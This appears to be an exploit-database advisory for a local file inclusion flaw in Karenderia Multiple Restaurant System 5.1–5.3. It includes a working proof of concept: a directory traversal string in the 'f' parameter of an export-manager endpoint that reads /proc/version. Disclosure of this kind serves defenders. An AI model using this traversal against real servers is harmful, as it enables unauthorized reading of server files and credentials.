Karenderia CMS 5.1 - LFI Vuln.

vendor:

Karenderia Multiple Restaurant System

by:

Mehmet EMIROGLU

7.5

CVSS

HIGH

LFI (Local File Inclusion)

CWE

Product Name: Karenderia Multiple Restaurant System

Affected Version From: 5.1

Affected Version To: 5.3

Patch Exists: NO

Related CWE:

CPE: a:karenderia:karenderia_multiple_restaurant_system:5.1

Metasploit:

Other Scripts:

Platforms Tested: Wamp64, Windows

2019

Karenderia CMS 5.1 – LFI Vuln.

The Karenderia CMS 5.1 is vulnerable to LFI (Local File Inclusion) vulnerability. By manipulating the 'f' parameter, an attacker can include arbitrary files from the server, leading to unauthorized access to sensitive information.

Mitigation:

The vendor should release a patch to fix the LFI vulnerability. In the meantime, it is recommended to restrict access to the affected endpoint and sanitize user input to prevent directory traversal attacks.

Source

Exploit-DB raw data:

===========================================================================================
# Exploit Title: Karenderia CMS 5.1 - LFI Vuln.
# Dork: N/A
# Date: 04-07-2019
# Exploit Author: Mehmet EMIROGLU
# Software Link:
https://codecanyon.net/item/karenderia-multiple-restaurant-system/9118694
# Version: v5.3
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Karenderia Multiple Restaurant System is a
restaurant food ordering and restaurant membership system.
===========================================================================================
# POC - Frame Inj
# Parameters : f
# Attack Pattern :
%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc%2fversion
# GET Method :
http://localhost/kmrs/exportmanager/ajax/getfiles?f=/../../../../../../../../../../proc/version
===========================================================================================